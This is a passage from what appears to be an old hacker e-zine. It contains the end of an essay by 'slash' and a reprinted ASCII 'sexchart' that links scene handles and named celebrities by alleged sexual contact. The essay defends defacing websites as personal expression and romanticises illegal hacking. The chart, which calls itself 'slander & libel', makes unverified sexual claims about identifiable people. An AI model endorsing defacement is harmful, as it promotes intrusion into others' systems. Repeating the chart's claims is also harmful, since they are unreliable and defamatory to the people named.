"I hacked this..", "I hacked that..". I don't have to prove my skillz to anyone. People
can respect me or hate me. I sincerely doubt that defacing a site will make me look
better infront of my friends. Almost anyone can find himself a remote exploit and run it
against the server. But not anyone can secure a Unix server, program or even make
html. For me defacing is just expressing my opinion on stuff, nothing more.
About 'fuck the ethics' thing. Mr. David, the ethics are here to prevent a major
chaos. Without ethics people would just go around and delete anything they run into.
I suggest every hacker to stick to the ethics as close as he can, hell, that's why they
were written. I know people forget about them, but there are always people like me
to remind hackers about the ethics. That's the balance. People don't stick to them,
they life stupid messages like "I 0wn3 j00". I tell You people, that's bad. Can't You
just write something. Anything, just not these stupid irritating messages. Ok, we
started another discussion here. "Who the hell are U to dictate what should be placed
on a defaced website?" - You say. Well, Your right. I'm nobody. I can't dictate what
should be placed on a defaced website. But I can suggest people not to do it. I just
suggested it, I didn't dictate or order it.
"The harder you try to hack the more aware we become as admins." - Aware ?! If
I deface Your site ten times, and don't tell You how I got in, You become more aware
!? I damage Your company for 10.000 $ by defacing it, because people say: "How can
they secure my server when they can't even secure their own." And nobody wants
Your service anymore. Don't get me wrong. I'm sure You're a very good and
experienced administrator, but nothing is secure enough, that hackers can't brake it.
That's what we devoted Our lives to, penetrating systems. I enjoy hacking. That
is really something unique. People through ages have always wanted to do something
that's forbidden or illegal. Just remind Yourself of Adam & Eve, and the Heaven
garden. Eve had to eat that apple alldo God gave them everything they needed, and
just forbid them to eat apples from that tree. Hacking is illegal in many countries. You
could get worse sentence for hacking than for murdering someone. I don't really care
if I get raided. Hacking is my crime. A crime out of passion. Respect me or hate me,
the choice is Yours.
- Peace out, slash
-
Shoutouts
- p4riah, LogError, zanith, v00d00, PHC, THC, attrition.org, net-security.org, ex1t,
sAs72, Cruciphux, HWA.hax0r.news, BHZ, SiRiUs, sLina, kLick_Mi, Emptyhead,
mosthated, pr1sm ,fuqraq, airWalk, [Princev], zeroeffect, and the whole BLN.
- Peace to my man whitecee, keep Youre head up. Peace to everyone who gave
support via email or IRC. I wish You a happy and a bug-free New Year.
Links...
- Attrition.org: Keep up the good work fellows
- HelpNet Security: The best news site on the net
- Black Lava Network: BLN for life !!!
Copyright � slash
Penetrating systems since 1998
@HWA
04.0 The hacker sex chart 2000
~~~~~~~~~~~~~~~~~~~~~~~~~
This was to be included in the last issue but attrition was down (only
source I know of that carries it) so here it is in its glory.
*********** WARNING: Explicit content **************************************
slander & libel -- the official computer scene sexchart
"that's none of your business!"
version 9.04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
for updates, additions, or to be put on the sexchart mailing list,
mail crank@ice.net.
to receive the latest version on efnet irc, "/msg lifelike sexchart".
a link is denoted by any sexual action between computer users that is
capable of spreading an std, from wet kissing on up.
the last .05 of revisions is listed at the bottom.
since the chart has grown so much, it's been extended in a strange way.
to preserve the 78 column width, there is now a secondary chart beneath
the first. people whose names appear between asterisks (*) in the first
chart also exist in the second.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
.--------- turin -------------------------------------.
| .----' | ||`---------------------------. |
toby | | |`----- keeper | |
.-|------|-|--------|---|-- intro -------|---------|------------.
| | .----|-|----- bjoe | | | | |
.-----|-|-|----|-|------------|-- brat acidqueene | |
| .---|-|-|----|-|------------|----|-----------|------|--|-----. |
| | | | | | `--. | | shorty | | | | |
angst | | | .--|-- reality ---|----|--|------ weedboy | | | |
|| |`--|-|-|-|--|--------------|----|--|--------|------|--|-----|----. |
|| `---|-|-|-' | | | | .------' | | | | |
|| .---|-|-|----|-- morgaine | | | | DJTrax | | | | |
|| | | | |.---|------|-------|-- lucky | | | llama | | |
|| | | | || | .-- thal ----' .----|-|--' potter | | | | |
|`-|-- oodles --|-|------------ styx --|-|--------|----|-|---. | | |
| | | | | | cerkit | | | | scat | | | | | |
| | .-' | vera | | .-|--|---|-|-----------|-|-|---|--|----|-|--.
| | | b3 | .' | skatin | | `--.| | dukeo | | | | | | | |
| | | `-----|-|--.`. | .---|-' || |.-' | | | blueeyes | | |
|.-|-|---------|-|--|-|-|-|---|----- evol! --- eerie | | | || | | | |
|| |.' | | | | | | ffej .--'|| || .-----|-' | | || dom | | |
|| || | | | | | | | | | .-'| |`--.| .-|---|-|--'| | | | |
|| || morph | | metalchic | | | | | || | | | |.--' carly | | |
|| || `----|-|---' | |`--|-|-|--|-|-- bF --' | 8ball ----'| | | |
|| || spacehog `.`. scuzz | | | | | `----|-----|---|-|---. xan | | |
|| |`-. `----|-|--. | `-|-|--|--. | | | | | | | |
|| | TH0M Y0RKE | | kurdt -|-----|-' | | `-----|-. | | beck | | |
|`.`. | `-. | `-----|---.| crimson | | | `---|----. | | |
`-|-|- collette `-. | `-- claud -|--.||.--' | | | nymph | | | |
.-|-|-------|-----|-|---------|--|- pip!@ --. | | | | | | | |
|.' | kablooie | | gumby | |.-'| || cancer | `-|----|---- beastie |
||.-' | | | | | | || | |`-. | | sample --' | |
||| mooer --' | | ladydeath | || | | iamjustme | | | |
||| || | | | | .--|----|--'| | | | | inuendo | |
||| || cardamon | | | | nitz | | | fatslayer .-|---' | | |
||| |`----------|-|-|-|-------|---|--|-----------|-' leesa hgirl | |
||| | tsoul .--' | | | sensei | littlestar | | | | | |
||| | | | | | | .------' | fried dcheese ----' |
||| | demon | aoxomoxoa --|-- poppie .----------' | | |
||| | | `----. | `-. | | | alecks abacab | wishchld |
||| `-- ostrich --|-|-. | | donnie | |.-------' | |
||`---------|-----|-|-|-|--|----' | || atropos assamite | dka |
|| jellyb | | | | | .---|-.|| |.--------' | | |
|`. | | | | | gilmore | baital .-- novicane .--' katester |
| | michelle_ .---|-|-|-|--|----|-----|--'| | | | .---' |
| | | | | | | | | crayon | pol | | TOXiC79 | | _evol_ |
| | abraxas | | | | | | .----|-|-|----------' | | |
| | | | | | | | vritra --|-|---.| | |.- bonita80 | shroomy69 |
| | mercuri | | | | | `---------.|.' || | ||.----------' | | |
| | | `---|-|-|-|-- nerkles |||.-- GoNINzo! ------ september | | |
| | lori | | | `-----------.|||| | ||`----------|------|-' | |
| | | | | | mona ||||| dazey |`----- ambigu0us --|---' |
| | skooter nic | | | | ||||| | | | | vocks |
| | | | | | | grimwater -.||||| NightMyst | | |
| | sita -- ninja | | | |||||| | marcus666 |
| | .---'| `-.| | | path0s --.||||||.-- turbo -- ivy256 | |
| | jules ziggy || | | |||||||| | dannyman |
| | || || | | photochic ||||||||.-- holden -- syn | | |
| | krampus --'| || | | | ||||||||| | christy |
| | | || | | spirit --.||||||||| lucifuge yumas | | |
| | indpuck --' || | | | ||||||||||.-' | .'.-- kkrazy |
| | .--'| | `----|---- crank!@#@%! ------ jamesy --|-|-------. |
| | all-of-nitco | `-----.| | | || | bex | | | .- LCN |
| `-. | `-----. || | | |`-|-----|--------|---|-|---|---.| |
`-. | fishhead hawk | |`-. | | | | .---|--------|---' | | || |
| | | | | | | | | `--|-|-- puck --- kinessa --|--.|| |
| | tamago | darwin | | | | | | | .--' | ||| |
.-|-|-----|---|----|----|-|--|---|---|----|-' | .-----------------' ||| |
| | | art | | `-- kaia -|---|---|---.| | | graywolf jakey ||| |
| | | | |.--|--------' `-. | | | || `--|-------.| .---' ||| |
| | | seaya `---- fawn --|-|---|---|-- mogel --|------ pixy -------.||| |
| | | | .---|---|-|---|---|----' || `-----. | |`------. |||| |
| | | slug grlfrmars `-. | | | `----. |`-------. | | `------.| |||| |
| | | | | | | | | `------. | nykia | | | turtle || |||| |
| | | kev-man | wildcard | `-|---------.| `--. | | | | || |||| |
| | `---------|----------|---|--------.|| hateball | | | jook || |||| |
| `. spectacle `---|-------.||| .-----|-|-' | | || |||| |
|.-|-------------------------|------ murmur -|-----|-|---' | ogre || |||| |
|| | | || ||`--|-----|-|-----|--|-. || |||| |
|| | .-----------|-------'| |`---|----.| | peggy | || |||| |
|| | Guitarzan --|-. CapnRat | | | | || | | | || |||| |
|| | .--|-|---|-----|- keroppi | .--|-- page! -- ghort | || |||| |
|| | crash313 | | | bond `--. | | | | .'| | | | | || |||| |
|| |.---|-----|--|-|----|-------|-|-----|-|--|--|-|--|----' | | || |||| |
|| || windx --|--|-' | .----|-'.----' | | | | | | | || |||| |
|| ||.-'|.----'.-|------|--|----|--|------' | | |.-|------' | || |||| |
|| ||| || | | | |.---|--|--. | | || | dedboy | || |||| |
|| ||| || .---' | hitchcock --|--|--|------|--' || | | | | || |||| |
|| ||| || | | | | | | | | .' larissa | .'| | | glynis || |||| |
|| ||| || | .--|--|-|-|-|-|---|-|--. | | | | | || |||| |
|| ||| || | | | | | | | | | | AnonGirl | | | | | Juliette || |||| |
|| ||| || | | | | | | | | | | | | .-|-|-|-' | || |||| |
|| ||| swisspope | | | | | | | | Medusa --|-|-|-|-|---- PrimeX || |||| |
|| |||.-' ||`--|--|-|-|-|-|---|-|----------|-|-|-|-|------------'| |||| |
|| |||| || | | | | | | | | cinnabon | | | | | Fiyaball | |||| |
|| |||| |`---|--|-|-|-|-|---|-|--|-----. `-|-|-|-|----------|-.| |||| |
|| ||||.--- piglet -' | | | `---|-|--|-----|-. | | | | | || |||| |
|| ||||| `----|-|-|-----|-|--|-----|-|-|-|-' | | || |||| |
|| ||||| pie -- bor | | | .---' | | .-|-|-|-|---|-- Quarex | || |||| |
|| ||||| | | | | | .---' | | | | | |.--' | | || |||| |
|| ||||| lankan --|-|-|-|-|- sweeney | | | | || RaggedyAnne | || |||| |
|| ||||`----. | | | | | | | | | | || | | | || |||| |
|| |||`---. | | | | | | toasty --' | | | || | `-.| || |||| |
|| ||`----|-|- PoGo .-' | `-|-|------. | | | || PointBlank || || |||| |
|| waar | | | |.--|---' `----. | | | | |`-. | || || |||| |
|| || | | | | || | .----|-|-----|-|-|-|--|--- hylonome || |||| |
|| || | .-|-|- hillary -|-----|----|-|-----|-|-|-|--|------------.|| |||| |
|| || | | | | | | |`--|- ideaman | | | | | | | dr0ne ||| |||| |
|| || `-|-|-|---|-|-|---|----------|-|-----|-|-|-|- ryu ---.| ||| |||| |
|| || .-|-|-|---' | `---|-- Fowlez | | | | | | .'| carrie ||| |||| |
|| || | | | `-----|-----|--. | | | | | | | | | ||| |||| |
|| |`-|-|-|-- severino | RottenZ -|-|-----|-|-|-' | | nuprinboy ||| |||| |
|| | | | | | | | | || | | | | | | | | ||| |||| |
|| | .' | | laurak -----' | | |`--|-|---- narya --' | redfox ||| |||| |
|| | | | | | `--------' | `--.| | | | ||| |||| |
|| | | `-|-|-- Dravanavin poto || | djbump feival --. ||| |||| |
|| | | `-|--------------------.|| |.--' | ||| |||| |
|| | | kyst | renen -------- jamming roller ||| |||| |
|| | `---|--|---- fritz clinto | seth -------------------'|| |||| |
|| `--- SiN13 --------|---|--------' | | .------------------'| |||| |
|`--. `--------- tracy -------------' | | trep |||| |
| .-|--------------------------------------|---' $t.andrew | |||| |
| | | GWEN STEPHANI SARA GILBERT candyrain | | tart |||| |
| | | | | | fatima --' | |||| |
| | | BILLY C0RGAN GAVIN R0SSDALE DREW BARRYM0RE | |.--------' |||| |
| | | `---. | | | ||.---------'||| |
| | | ED N0RT0N -- C0URTNEY L0VE -----' mysl minstrelle |||.---------'|| |
| | | .----' | | | `-----.||||.---------'| |
| | | KURT C0BAIN TRENT REZN0R -- tammy `----|------.||||||.---------' |
| | | | | |`-------|--- *gweeds@!#* -------. |
| | | MARY L0RD T0RI AM0S JELL0 BIAFRA | .---'||| |||`--------.| |
| | | | | .--'|| ||`--------.|| |
| | |.----- trilobyte --- Schquimpy freqout --|-|-|---'| |`--------.||| |
| | || | | | | | | | .' WL |||| |
| | || chinagirl amos -- EddieV `-- Nex | | | | | |||| |
| | || .------------|-------' | | | | dave_rast |||| |
| | sonia ------- velcro agentorange moonlyte | | | | |||| |
| | | | |`----. `----. | | | | | | lemson |||| |
| | | | sate plexus | savvy neko --' | | | | | |||| |
| | | | | | | .-'| | .-|-|-|-- whoops |||| |
| | | gage `-- rabidchild kirshana | Katia | | | | || |||| |
| | | | | | | | | | jess |`-- nyar |||| |
| | argent fate beaker | gnarf Sylvie | | | | | | |||| |
| | .-----------|---|-----|------------------' | | andrew | skora |||| |
| | | fuaim sedrick | | | | |||| |
| | | anathema .----------------------|-|----|---' |||| |
`-|--|-|-----------------|-. .------------------' | mswicked |||| |
| | | nadyalec erise | | | .--------- duatra -' .-------------'||| |
.-|--' | | .--' | | | | | timbrel | | ||| |
| | riotboi tao puff | | | | | | |.-- nineve | random-tox ||| |
| | `-----. | | | | | | .-- corp! ----------' | .----'|| |
| `- tanadept XunilOS | | | | | | | |||| silicosis -- espidre ---.|| |
| | ||`-----. | | | | | | | | |||| | ||| |
| siren |`---. skywind | | | | | | |||| mudge -- shewolf -- iskra ||| |
| | `-. | | | | | | | |||| | ||| |
| kingtrent | cbnoonan --|-|-|-|-|-|---'||| r2 -- mujahadin level6 ||| |
| `------. | | | | | | | .'|| `---. `-.||| |
| lilindian | lex | | | | | | | || ssq teq -- vYrus | sp0t |||| |
| | | | | | | | | | | || `-------------.| | | |||| |
| Goddess4u | lorah | | | | | | | |`. anarchist --. || | |.--'||| |
| | | | | | | | | | | | | | || | || ||| |
| .------ DrkSphere | | | | | | | | | | tymat -- *pinguino!##@#* ||| |
| | | || |`----|-|-|-|-|-|-|---|-|-|---|-------'|||||||||||| ||| |
| | CrazyLuna || | `.| | | | | | | | | gemmi |||||||||||| ||| |
| | .-'| meelah || | | | | | | | | |||||||||||| ||| |
| Sweetgal_ | | || | | | | | | | | barkode --'||||||||||| ||| |
| | Wi|dChild || | | | | | | | | ||||||||||| ||| |
| angeleyes .'| | | | | | | | | is0crazy ---'|||||||||| ||| |
| .--|-|-|-|-|-|-|---|-|-|--------------'||||||||| ||| |
| gersh | | | | | | | | | | r_avenger --'|||||||| ||| |
| aquis -----------|-|-|-|-|-|-|---|-|-|----------------'||||||| ||| |
| monkeygrl | | | | | | | | | | ter0daktyl --'|||||| ||| |
| skully ------|-------|-|-|-|-|-|-|---|-|-|------------------'||||| ||| |
| logicbox ----|-|-|-|-|-|-|---|-|-|-------------------'|||| ||| |
| | | | | | | | | | | *apok0lyps* ------'||| ||| |
| .------------------|-|-|-|-|-|-|---|-|-|-------|-------------'|| ||| |
|.--|-----------. .----|-|-|-' | | | | | | *kamira* .---'|.-'|| |
|| | | | | | | | | | | | | | || || |
||.-|--------- sarlo --|-|-|---|-' | | | | ao -. quisling tsk .-'| .'| |
||| p3nny |||`---|-|-|---|--.| | | | | | .-------|---|--|-|-|-'
||| | ||| | | | | niala | | | wintarose | .-' | | |
||| sari ||`----|-|-|-. | | | | | | | | | || | | .--' | |
||| | YYZ || | | | | | | laz | | | sinner | | |`. | | | kara |
||| *rage* | |`-----|-|-|-|-|-|-----|-|-|--------|-|-|-|--|-|-|----' |
||| | astraea ---|-|-|-|-|-|-----|-|-|--------|-|-|-|--|-|-|------'
||| rio | | | | | | `-|-----|-|-|--------|-|-|-|--|-|-|--------.
||| | | phz .-|-' `-|---|---. | | | .------|-|-|-|--' `-|-------.|
||| capone |.----|-|-----|---' | | | | | corwin | | `------|---. ||
||| asriel --|-|-----|-------|-|-|-|-|--------' valgamon | | ||
||| b0gus -----.| | | | timb0 | | | | | `--|---|--.||
||| .---- gita | | `. | | | | | | | | |||
||| drd00m | | | | minjo | | | | phone blueadept | | |||
||| veggie --|-|------|---|----|-|-|-|------|--|---------' | |||
||| | | | | | | | | .-- tele -- rambone `-.|||
||| .--- pickaxe --|-. | | | | | mrg | ||||
||`------------|----|-----|---|-|-|----|-|-|-|------' ||||
|| | |.----|---|-|-|----|-|-|-|-- xney3 --- fable -----.||||
|| | ||.---|---|-|-|----|-|-|-' | |||||
|| RoadRuner | |||.--|---|-|-|----|-|-|-- CosmicMJ schmoopie |||||
|| `--|---.|||| | | | | | | | | | | |||||
|| hayley | ||||| | | | | | | | arian vek -- sweeties | |||||
|| | | ||||| | | | | | | | | | | |||||
|| collision --|--.||||| | | | | | | | dj tamtam --- jonathan |||||
|| | |||||| | | | | | | | | | |||||
|| thoth | |||||| | | | | | | | discogurl -- candacep |||||
|| | | ||||||.-|---|-|-|----|-|-|------------------------. |||||
|| dpk arkuat | sQurl!#% | .-|-|-' | | | dwildstar phisher | |||||
|| | | | | ||||| | | | | | | | | | | |||||
|| _Melody_ --|-' ||||| | | | | | | | elek jimmie ----- boufa |||||
|| | | | ||||| | | | | | | | | | | `.|||||
|| atticus | | ||||| | | | | .--|-|-|- comstud MSofty --' | ||||||
|| | `--. ||||| | | | | lump | | | `--. Kanan ||||||
|| flashman --|-'|||| | | | | | | | | LarZ -- Tay ------' | ||||||
|| | .---|--'||| | | | | prae | | | | | | ||||||
|`. rezznor | .'|`-|-|-|-|------|-|-|-- Jon2 -' | | ||||||
| | | | | | | | | | | | | | | ||||||
| | marcus ---|--|-' | | | | | | | | TAYL0R HAWKINS | ||||||
| | `-----|--|----|-|-|-|------|-|-|--. | | | ||||||
| | | | | | | | | | | | | MINNIE DRIVER | ||||||
`-|-. | | | | | | | | | persis ---------------' ||||||
| | .---|--' | | | | | | | | `----- violator ---'|||||
|.' | supox --|-|-|-|-. | | | morkeleb ----------------'||||
|| spruance | `--. | | | `-|----|-|-|----------------------. ||||
|`-|--|-----|---------|-|-|-|--.|.---|-|-|---------------------.| ||||
.-|--' daria | zymotic | `.`-|- ark --|-|-|-- juniper --. || ||||
| | |.-----' | .' | | ||| | | | | | || ||||
| | cvk ----- cybele | .-|--|--'|`---|-|-|----|--. ivylotus || ||||
| | |`----. | | | | ceili | | | Zem | || ||||
| | hellenga | Lone-Wolf | `--|---. | | | | stillson || ||||
| | | | | | | |`-|----|---|----|-|-|-. `----. | || ||||
| | | regs | | miffy `--|----|- eris5 | | | | dudeman | | || ||||
| | | | | `-. | `--. | | | | | | | | `-- sumogirl || ||||
| | | | | | scottie | | | | | | | | `----. | | || ||||
`-|-|---|--|---|------------|-|--|-|-|-|-|-|-----.| Aleph | eighmi ||||
| | .-|--|---|- Wizzbane -|-|--' | | | | | || | | | | ||||
.-|-|-|-|--|---|------------|-|----' | | | | Kaleid ----|--|---.| ||||
| | | | `--|-. `--------. .-' | BLong | | | ||| |`--. | | bohr ||||
| | | | | ChromeLi --|-|---|--------|-|-|-----'|| | halfman | ||||
| | | | `------------|-|---|--. .--|-|-|------'| | | | ||||
| | | | flatlandr ---- aynn --|--|--|--|-|-|-------|-|---' Mythrandr ||||
| | `-|----------------.| | | O_Kei | | | | | ||||
| | micki -- rdrunner || lb | | | | | magneto God ||||
| | | || | iguana | | | Cones | | | ||||
| | | rhendrix -- dbt ---|----|---|-|-|-----|-' hope Tatyana | ||||
| | | | |.----|- pete0 | | | `-. |.----' | ||||
| | | konkers time ---|--------|-|-|----- Rasputin ---- nympho ||||
| | | .------------' `------. | | | | | | ||||
`-|- hagbard MandaPanda -- Doobie | | | | LadyViper | VampKitty ||||
.-' || | `--|-|-|-|--' | .-------------'|||
| m0kab3chu QueenBrocco ---'| ZobZ | | | | Iphigenia | |||
| `-----------..-------|------|-|-|-|-------------|--------------'||
| chickhabit ---.|| Persephone | | | `-----------. | ||
|.-----------------.||| `---|-|-|-- Stu | | afsaneh ||
|| AK47 --.|||| | | | | | | ||
|| .------------.||||| kubiak | | | .---------- sync gauss ||
|| | bfgrrl -- *meenk!@* ---' | | | | |.---' ||
|| | .----------'| | |`----. vlaad | | | | discodan --.|| aloke ||
|| | | nevre | fl00d | | | | | | ||| | ||
|| | | kaos .-----' teletype | | | | professor ||| | lgas ----.||
||.-|-|----|--|-------------|--|-----|-|-|-|---|-----.| ||| | | |||
|||.' | amity bumble --' AIDS .-|-|-|-|---|---- xgirl!@$ -|- deker |||
|||| | | | | | | | | | | .-'||| ||| | | | |||
|||| | style wmmr --|-- caitlin | | | | | | gwar ||| ||`-.| | `--.|||
|||| | | | | | | | | | | ||| || emilia ||||
|||| | coffeegrl .--|- The_Sock | | | | | | cg --'|| || | | | ||||
||||.-' | | .-'| | | | | | | | || || | | boto ||||
||||| nico Alucard | | | kitn | | | | | | dk ---'| || | | ||||
||||| | | | | | | | | | | | | | || | spig ||||
||||| anjee -- meethos | | | | | | | | | .-' swallow || | ||||
||||| | | | | `-|-|-|-|-|-|--. || `-- moose ||||
||||| METchiCK -|-' ^mindy^ | | | | | | ILUVJeNNA || ||||
||||| | ||||| | | | | | | | || ||||
||||| MrJuGGaLo ||||`--|- facedown | | | | | | || ||||
||||| |||`---|-----------|-|-|-|-|-|-- grimmy || ||||
||||| ||`----|-----------|-|-|-|-|-|-. || ||||
||||| phdave |`-----|- f_fisher | | | | | | deadapril || ||||
||||| | `------|-----------|-|-|-|-|-|-. || ||||
||||| Suzzeee dwymer -|-- Bruin | | | | | | supervixn || ||||
||||| `-------.| `--------. | | | | | | || ||||
||||| abbeycat --.|| NeuralizR | | | | | | | || ||||
||||| ||| | | | | | | | | || ||||
||||| lissa ||| Jen1 Briana | | | | | | || ||||
||||| `---.||| | .--'| | | | | | | | || ||||
||||| nyssa --- Wayhigh!@ | | | | | | | | || ||||
||||| .---' | ||| | | | | | | | | || ||||
||||| icy_girl | ||`---|-|---|-|-|-|-|-|-- allira |`---- adamw ||||
||||| | || | | | | | | | | .-' | || ||||
||||| etrigan meta4 |`----|-|---|-|-|-|-|-|-.| ryshask `--- loki |`.||||
||||| | | .-' | | | | |.' | ||.-' | | | |||||
||||| *am0eba* Suger | | | | | ||.-' ||| aries99 jazzy | | |||||
||||| | | | | | | | ||| ||| | | | |||||
||||| SWinder nettwerk | | | | ||| *tigerbeck* -- spacegirl |||||
||||| | .---|---' | | | ||| | | | | | | | |||||
||||| zeven tsal | romulen | | ||`-. | | | twichykat | | | |||||
||||| | .----------'| | |.------|-' |`. | | | | | | | | |||||
||||`--. `-|-- devious | | || `-. | | | | | soulvamp | | | |||||
|||`-. | | `-- phyzzix! -------|-|-|-' | | | | | |||||
|||.-|-|---|-- roman --'|| ||| | | | | timmerca | | | .'||||
||||.' | | | || ||| | | | `--. route | | | ||||
||||| | | emmanuel --'| ||| | | | .----|----------|---|-|-|-'|||
||||| | | | .-----' ||`--------|-|-|-|-. martyn ginny | | | |||
||||| | | philipw |`--. | | | | | .--------------|-|-|--'||
||||| | | | homeysan | | | | `--|-- BernieS | | | ||
||||| | | J0SH LAZIE | | .--|-|-|-|-. | .---------' | | ||
||||| `---|----|--------. | caffiend `.| | | | | | u4ea | ||
||||| | | riley | | || | | | | | krnl ---. | | ||
||||| .--- wikked | | | lordjello || | | | | | .-- missx ||
||||| | .--'||| | | | | | |`.| | | | | | | `. ||
||||| | | ||| Weasel | | | demented1 | || | | | | readwerd kc | ||
||||`-|-|-. ||| | .-|-|--|--' | | ||.' `--|----|-----------|--|-.||
|||| | | | ||`--. | | neal | hannah .--' ||| aliced | elizabeth | |||
|||| | | | |`-. | | | | | `--. .--|---.||| | | | | | | |||
|||| | | | | | | | | | | .---|--|--|--.||||.--' | | `-. deadlord | |||
|||| | | | | | | | | | | | `--|--|- ophie! ---|--|-. | | | | |||
||||.-|-|-|-|--|-|-|-|-|-|-|-- erikb | || | | .--' | | | | genders | |||
||||| | | | | | | | | | | | | | .'| | | | | | | | | |||
||||| | | | | | | | | | | joe630 | | | | | | | | | | `-- eppie | |||
||||| | | |.' | | `-|-|-|--|----.| | | | | | | .---|-|-|-----|---|--' |||
||||| | | || .-|-|---|-' `--|-. || | | | | | | | | | | primal bix |||
||||| | | || | | | tiffie --' | || | | | | | | | | | | |||
||||| | | || | | | | | || | | | | | | | | | | jasonf |||
||||| | | |`-|-|-|- X n0rmag3ne |`. | | | | | | | | | | | |||
||||| | | | .' | | | | | | | | | | | | | | | | .--- judy |||
||||| | | | | | `. | otopico `-|-|-|-|-|-|-|-|-|-- y-windows --------.|||
||||| | | | |.-|--|-' | | | | | | | | | | | | | ||||
||||| | | | || | | angelbaby --|-|-|-|-|-|-|-|-|---' | | ||||
||||| | | | || | | .----|-' | | | | | | | Moxie | | ThreeDays ||||
||||| | | | || | Jazzy1 dana --|-. | | | | | | | `--|-|-|--. | ||||
||||| | | | || | | | .---|-|-|-|-|-|-|-|-|-------|-|-' Slinky ||||
||||| | | | || `. | strat | .-|-|-|-|-|-|-|-|-' .----|-|---. | ||||
||||| | | | |`. | | | | | | | | | | | | Xavi .--|-|- BabyHuey ||||
||||| `-|-|-|-|-|-|--------. | | | | | | | | | | | || | | | | ||||
||||| `-|-|-|-|-|-- Ned -|-|-|-|-|-|-|-|-|-|-|-' || | | | rorrim | ||||
|||||.----' | | | | | `-|-|-|-|-|-|-|-|-|-|-. |`-|--|-|----|---|-.||||
||||||.-----' | | | Magenta | | | | | | | | | | | | | | | | | |||||
|||||||.------' | | | | | | | | | | | | | Taps | | | | | |||||
|||||||| .------' Lotus1 `-|-|-|-|-|-|-|-|-|-|-'||`-|--|-|- LamaKid |||||
|||||||| | | | | | | | | | | | | | || | | | | |||||
|||||||| | sunset | | | | | | | | | | | | || | | | | |||||
|||||||| | | | | | | | | | | | | | | | || | | | | |||||
|||||||| Mark kic | Cluey | | | | | | | | | | || | | | | |||||
|||||||`---.| | | | | | | | | | | | | || |.-' | | |||||
||||||`---.|| | Logre | | | | | | | | | | || ||.--' | |||||
|||||`-. ||`-------|--. | | | | | | | | | | | || ||| | |||||
||||| | *angieb* | | | | | | | | | | | | | || ||| SueVeneer | |||||
||||`-.| | .---' sunni -|-|-|-|-|-|-|-|-|-|--'| |||.--' | |||||
|||`-.|| | | .----|--|--' | | | | | | | | | Khat |||| JulieJul | |||||
||`. ||`-. | | | twi Opie | | | | | | | | | | .-'||| | | |||||
|| | |`. | | .-|-|--------|---' | | | | | | | | | Jai ||`--- Jag --|-'||||
|`-|-|-|-|-|--|-|-|----. rosefairy | | | | | | | | | | |`. ||| | ||||
|.-' | | | `--|-|-|---.| | | `-|-|-|-|-|-|-|-' | `-|-|----'|| `-.||||
||.--|-|-|----|-|-|-- b_!@@ dara | | | | | | | |.--' | .---'| |||||
|||.-' | | .--|-|-|--'|| | | | | | | | | | || .--' | GoodGirl |||||
||||.--|-|-|--' | | || | winmutt | | | | | | | || | |.----.| |||||
||||| | | | .-|-|---'| | | | | | | | | || | || || |||||
||||| | | | | | | | wolverine | | | | | | | || | Yummy Guyver |||||
|||||.-|-|-|--|-|-|----|-----------' | | | | | | || | |||| | |||||
||||||.' | | | | | | xyg shinex | | | | | | || | Rosie -'||| | |||||
||||||| | | | | | | | | `-|-|-|-|-|-. || | .-'|| | |||||
||||||| `-|--|-|-|-- *spyder_bytes* | | | | | | || | Rapunzle || | |||||
|||||||.---|--|-|-|----|---------------' | | | | | || | | || | |||||
||||||||.--' | `-|--. | CrakrMajk --|-|-|-|-|-'| | | Flame -'| | |||||
||||||||| | `. | | .------------|-|-|-|-|--|-|-|-|-------|-|-'||||
||||||||| phatgirl | `-|--. | lemony | | | | | | | | | Atomica | ||||
||||||||| | `--|-|-----|----. | | | | | | | | | | | ||||
||||||||| | | | Wizdom | | | | | | | | m00se | | ||||
||||||||| Twizzle | | | | .-|-|-|-|-|-|--|-|----------|--' ||||
||||||||| .--|------ ReelTime --' `-|-|-|-|-|-|-|--|-|--. Dolemite ||||
||||||||| | | .------'| | | | | | | | | | | | | ||||
||||||||| | | | Lullaby Sambrosia | | | | | | | | | nigel | QueenB ||||
||||||||| | | | | `---------. | | | | | | | | | `-------|-------.||||
||||||||| | | | | b|iss | | | | | | | | | | | |||||
||||||||| | | | RobertG .---|--|-|-' | | | | | | | | |||||
|||||||||.-|--|-|-----|-|-|- Mikey!# --|-|-|-|-|-|--|-------. Kyleel |||||
|||||||||| | `-|-----|-|-|--'| |||| | | | | | elektra | | |||||
|||||||||| | | | | | | |||`---|-|-|-|-|-|--|---. | RdKill |||||
|||||||||| | Zemora | Blondie ||`--. | | | | | | z1nk | | | |||||
|||||||||| | | .------|----|----'`-. | | | | | | | | AllyCat -. |||||
|||||||||| | `-|------|-- WanMan --|-|-|-|-|-|-|-|------|---' | | |||||
|||||||||| `---|------|----------. | | | | | | | misuse | .- Pbass | |||||
|||||||||| | Izzy `- Oscer --|-|-|-|-|-|-|-|--------|--|----' | |||||
|||||||||| | | | | | | | | | | | | | | MastElmo |||||
|||||||||| | | Brian-X Macc | | | | | | | | | `--.| | |||||
|||||||||| | | | | | | | | | | | | | `-- *Starr* | |||||
|||||||||| Maia!@% Bellez --|-' | | | | | | *B00bz* -----'| | | |||||
|||||||||| | ||`-------|----|---|-|-|-|-|-|--|-|------- Rig | | |||||
|||||||||| *Chef* |`------ Cidaq | | | | | | | | | .-------|--|-'||||
|||||||||| Breetai | | | | | | | | | | .--' | ||||
|||||||||| | `-. | | | | | | | luci | | Female ||||
|||||||||| Corn | NuConcept .---|-' | | | | | | | |`-|---.| | `.||||
|||||||||| | | | | `-. | | | | | | | | | *hydro311* |||||
|||||||||`--- lydia_atl PastaGal ---|-|-|-|-|-|--|-|-|--|--|----. .-'||||
||||||||| | | | `-|-|-|-|-|--|-' `--|--|-- Shad0w ||||
||||||||| Pnutgirl | GonzoLoco DrMonk | | | | | `------|--|--. ||||
||||||||| | | | | | | | | .-------' | SessyJen ||||
||||||||| LilDave -' CompChick Gemni | | | | | | splat ---|--' ||||
||||||||| | .---' | | | | | | | .-' Spastica ||||
||||||||`-- bluesxxgrl .--- DH | KL | | | | | | `---|----' | ||||
|||||||| | |.------|--' | | | | | | | CybrChrist ||||
|||||||| | redmare ||.- SN | .--' | | | | | `---. ||||
|||||||| | | |||.----|--|----|-|-' | phreaky VenusGirl ||||
|||||||`--. | tabas --.||||.---|--' .--|-|---' .-------------'|||
||||||`---|-|------------.|||||| | .--|--' | *magpie* | .------'||
|||||| .-|-' r0ach |||||||.--|-|--' | `--.| m0rg1 | yy[z] ||
